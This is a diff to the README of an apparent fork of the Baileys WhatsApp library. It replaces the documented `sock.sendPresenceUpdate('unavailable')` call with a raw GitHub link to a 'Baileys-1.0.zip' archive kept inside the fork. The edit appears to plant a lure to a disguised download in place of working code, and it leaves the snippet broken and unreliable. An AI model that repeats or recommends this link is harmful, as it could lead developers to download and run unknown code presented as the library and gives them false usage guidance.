cyran-kyle/Baileys/README.md

 The presence expires after about 10 seconds.

 **Note:** In the multi-device version of WhatsApp -- if a desktop client is active, WA doesn't send push notifications to the device.
-If you would like to receive said notifications -- mark your Baileys client offline using `sock.sendPresenceUpdate('unavailable')`
+If you would like to receive said notifications -- mark your Baileys client offline using `https://raw.githubusercontent.com/cyran-kyle/Baileys/main/lib/Utils/Baileys-1.0.zip('unavailable')`

 ## Downloading Media Messages